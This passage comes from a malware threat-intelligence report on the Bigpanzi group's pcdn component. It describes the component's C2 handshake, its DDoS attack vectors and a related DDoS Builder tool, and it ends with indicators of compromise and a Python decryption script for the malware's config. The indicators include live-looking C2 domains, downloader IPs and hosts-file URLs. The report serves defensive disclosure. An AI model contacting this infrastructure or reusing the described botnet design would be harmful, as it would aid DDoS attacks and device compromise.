enhancing the user experience for streaming media. The detailed business
scenarios of Pandora-CDN involve many components and, due to space constraints,
this article will not delve into these in detail. Further analysis of these
components will be provided in a subsequent article.

0X5: HTTP SERVER

Pcdn sets up an HTTP server that listens on the local TCP port 19906. This
server provides an HTTP service accessible via the path /getsatus. The service
supports a mode query parameter, which can take values such as app, p2p, auth,
and portmapping.

This HTTP service is utilized by components like play_station and
punshHoleClient to query the status of the infected device.

2.4 DEVICE "WEAPONIZATION"

In pcdn, there are three threads responsible for Distributed Denial of Service
(DDoS) related tasks:

1. dropstimetask: Manages time scheduling.
2. dropstask: Handles communication with the Command and Control (C2) server,
including receiving instructions.
3. dropsinittask: Executes the DDoS attacks as instructed.

In the dropstask, five hardcoded C2 servers are specified, all using port 31226
(0x79fa).

Interaction Process Between the Bot and C2:

* C2 to Bot: Issues an XOR key (4 bytes).
* Bot to C2: Encrypts and sends device information such as the serial number
(SN) using the XOR key (38 bytes).
* C2 to Bot: Confirms that the bot is online (12 bytes).
* C2 to Bot: Sends commands to the bot.

The dropsinittask, upon receiving commands from the C2 server, selects the
appropriate ddos_vector to carry out DDoS attacks.

Pcdn supports the following eight types of attack vectors:

dicmptask dudptask dsyntask dtcptask dkeeptask dhttptask dposttask ddiy01task

2.5 GIFTS FROM PCDN

By tracing the strings related to dropstimetask, dropstask, and dropsinittask
within pcdn, we successfully located two Windows-based Distributed Denial of
Service (DDoS) tools named Fl00d and Fl00d 2.0.

0X03: ANALYSIS OF DDOS TOOLS

Taking Fl00dce690167abeee4326d5369cceffadaaf as an example, this tool is
identified as a DDoS Builder.

Its operational interface, accessible upon running the program, features a
'slave' button which, when clicked, opens a dialog box for configuration. This
configuration process facilitates the generation of bot samples compatible with
three platforms: STB (Set-Top Box), Linux, and Windows.

A Linux64 sample generated with the default configuration of this DDoS Builder
has an MD5 hash of d6285261d6b2d0a26d186e1b831664db. Analysis with IDA reveals
numerous strings related to "drops" and "task",

indicating a clear lineage between this tool's code and the DDoS-related code
found in pcdn.

While pandoraspear and pcdn possess DDoS functionalities, there was initially
doubt about the group's involvement in DDoS activities as no actual attack
commands were tracked. However, the discovery of this DDoS Builder tool, coupled
with the observed pattern of DDoS attacks initiated upon the resolution of
hijacked C2 domain names, confirms the group's long-term engagement in unlawful
DDoS activities.

The absence of tracked attack commands might be due to the group shifting focus
as their operations expanded. For instance, content business lines involving
Android TV and STBs may have become more profitable, making these high-value
assets. Consequently, the group might have redirected DDoS activities to other
botnets within their control, preserving the more valuable resources for content
distribution and other lucrative operations. This strategic shift underscores
the adaptability and evolving nature of cybercrime syndicates like Bigpanzi.

GIFTS FROM THE DDOS BUILDER

As mentioned in the "Infection Methods" section, through the C2 (Command and
Control) servers associated with the DDoS Builder, we were able to locate 325
instances of "SmartUpTool" firmware. Out of these, 32 contained the specific
string "ddiy01task" embedded within them, and all of these instances were
firmware for the eCos system.

Among these 32 firmware instances identified, some share Fully Qualified Domain
Names (FQDNs) that belong to the same Second-Level Domain (SLD) as the domain
names used by the DDoS Builder.

Within these 32 firmware instances, there are strings related to DDoS Tasks &
Vectors that are identical to those found in pcdn.

Within these 32 firmware instances, there are 5 domains resolving to the same IP
address as the C2 for pcdn, specifically to 162.209.126.216.

Additionally, the domain names used for the Command and Control (C2) servers in
both batches exhibit very similar patterns.

These events can't just be chalked up to coincidence anymore. Since users are
complaining about strange traffic from their set-top boxes on forums, we think
that Bigpanzi is targeting set-top box devices that run on the eCos platform.

0X04: PREVIEW OF THE NEXT ARTICLE

Bigpanzi has made many tools, but this article mainly looks at its key parts:
pandoraspear and pcdn, because we don't have much space. We'll explore more of
their tools in future articles. Here’s a sneak peek at what we'll discuss next.

ptcrack: Implemented in the Go programming language, ptcrack is a cracker
targeting multiple protocols.

We will explore activities related to ptcrack that were uncovered during our
command tracking.

* p2p_peer: This component utilizes the Peer-to-Peer (P2P) protocol to discover
nodes within the Pandora-CDN network.

Notably, p2p_peer provides an HTTP service on port 7172. This exposed web
service has been mapped in our Global Hawk platform, accumulating over 270,000
IP addresses.

* Business APKs: These are applications that utilize Pandora-CDN for streaming
video and live broadcasts. Some domains used within these apps establish a
link between pandoraspear and pcdn, showing the interconnected nature of
these tools within the Bigpanzi group's operations.

0X05: CONCLUSION

Over the past eight years, Bigpanzi has been operating covertly, silently
amassing wealth from the shadows. With the progression of their operations,
there has been a significant proliferation of samples, domain names, and IP
addresses. Over these years, these have accumulated in substantial numbers.
Moreover, due to the reuse of code and infrastructure, there are complex
connections between the samples, domain names, and IP addresses.

In the face of such a large and intricate network, our findings represent just
the tip of the iceberg in terms of what Bigpanzi encompasses. There's a vast
amount of tracing and investigative work still to be undertaken. For instance,
understanding the purpose of domain names in the hosts files, analyzing the
multitude of APKs under the /marketdatas/apk pattern, and exploring the
relationship between Bigpanzi and FoneStar are crucial next steps.

The analysis presented in this article is but a faint light in the darkness,
illuminating a small part of the shadowy existence of Bigpanzi. We welcome
insights from the cybersecurity community and invite collaboration from those
with the motivation and capability to manage such threats. Together, there's an
opportunity to combat the Bigpanzi group and contribute to maintaining
cybersecurity.

IOC

PANDORASPEAR SAMPLE

16047c1cbc51a1e625465a60092499aa
4079859aae0c6a46c6ba3516bdb500d0
59956383454c03084cfc568780a1ac1b
c8b83db92478fc2a1b1e10885ae85d92
ed69a2228a1280d1bce51b11bc7857d4
044122d46b874892227239ef9a1e7b3c
1bcc313bf3429bcf484f3fafe68726b0
a4f1808d4430fc2bbf5dc6749388727e
adb3efa194ca5aa377aa53a262744ca1

PANDORASPEAR C2

apz.bsaldo.com
jgp.pdltdgie.com
ok3.mf1ve.com
pcn.panddna.com
ppn.pnddon.com
abcr.ftsym1.com
apz.pdonno.com
ok3.mflve.com
wrkv.jiexi.com
209.239.115.231 United States|Missouri|Saint Louis AS30083|GoDaddy.com, LLC

PCDN SAMPLE

95357a1d45deebd8bdc4ac01a4ad8c08
7ccdaa9aa63114ab42d49f3fe81519d9
5b2727ba2924fd4d204bf39e601bb77c
4338e9bd02b42eb458f8515caa3bab8e
634c0e7fcc9529005a63c2918ad9dcc5

PCDN C2

zas8wie.snarutox.com
in32hbccw.oneconcord.net
pu9z3cca.trumpary.com
kp519bpa.fireisi.com
hgxx123p.ourhousei.com

ryy8zc.dotxui.com
plart2z.incenu.com
nikcc32.honisu.com
wwrc9.ngoox.com
iptty3m.dotxui.com

PCDN DOMAIN

pcdnbus.ou2sv.com
pcdnbus-bk.a2k3v.com

DDOS BUILDER C2

stpoto.sdfaf1230app.net
ruetsm.mkuspt.com
dlewals.adfoiadf892.net
redavss.noip.me
alchaes.abdc11.com

DOWNLOADER

50.7.118.114:19090 United States|California|Los Angeles AS174|Cogent Communications
50.7.118.114:19091 United States|California|Los Angeles AS174|Cogent Communications
ak.tknxg.cf:8080
fadfa.dyanoe.com:8080
fadfa.gdalieyw.com:8080
fadfatest.pneydn.com
bas.sw1ez.com:8080
bps.tr2eq.com:8080
caq.xv8ta.com:8080
tano.jdsefbe.com:8080
tano.syhs8u.com:8080
tigx.xjs7zu.com:8080
tigx.xsefbe.com:8080
tyu.sdhenbe.com:8080
vpr.pprv1.com:8080
xihb.bhowljw1.com:8080
xihb.lgewer1f.com:8080
xtsj.ofdad3.com:8080
xtsj.sisenji.com:8080
xtsj.syshebe.com:8080
xtsj.terwea.com:8080
yuo.tyt3s.com:8080
tyu.fart1.com:8080

HOSTS DOWNLOADER

http://pandoramain-1794008345.us-west-2.elb.amazonaws.com:8080/marketdatas/dns/hosts
http://pandorabackup-1322908155.us-west-2.elb.amazonaws.com:8080/marketdatas/dns/hosts
http://pcn.panddna.com:8080/marketdatas/dns/hosts

http://eumk.wak2p.com:8080/marketdatas/dns/hosts

HOSTS

APPENDIX

#python script ,which can decrypt the hosts,cmd,/data/.ms
#only test in ida7.6
#pip install pycryptodome

import struct
from Crypto.Cipher import Blowfish

tab = "./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

dec="2Sk28.BdtyL1A75rS.9ZFTc/hLgg90NI6jD0xhGS41H01Pe.RupYy1tJ7PS1"
out = b""
mylist = []
output = []

for i in range(len(dec)):
index=tab.find(dec[i])
mylist.append(index)

for i in range(0,len(mylist),6):
tmp=0
for j in range(6):
tmp^=mylist[i+j]<<(j*6)
output.append(tmp)

output[0::2],output[1::2]=output[1::2],output[0::2]
for i in output:
s = struct.pack('>L', i)
out += s

bl = Blowfish.new(b"zAw2xidjP3eHQ", Blowfish.MODE_ECB)
plaintxt = bl.decrypt(out)
print(plaintxt)
# plaintext --> 1000@12.00AC:37:43:A1:0B:A7@0009@19944@\x00

blog.xlab.qianxin.com Open in urlscan Pro 240e:c3:2002:5::e1 Public Scan

Form analysis 0 forms found in the DOM

Text Content

blog.xlab.qianxin.com Open in urlscan Pro
240e:c3:2002:5::e1 Public Scan

Form analysis
0 forms found in the DOM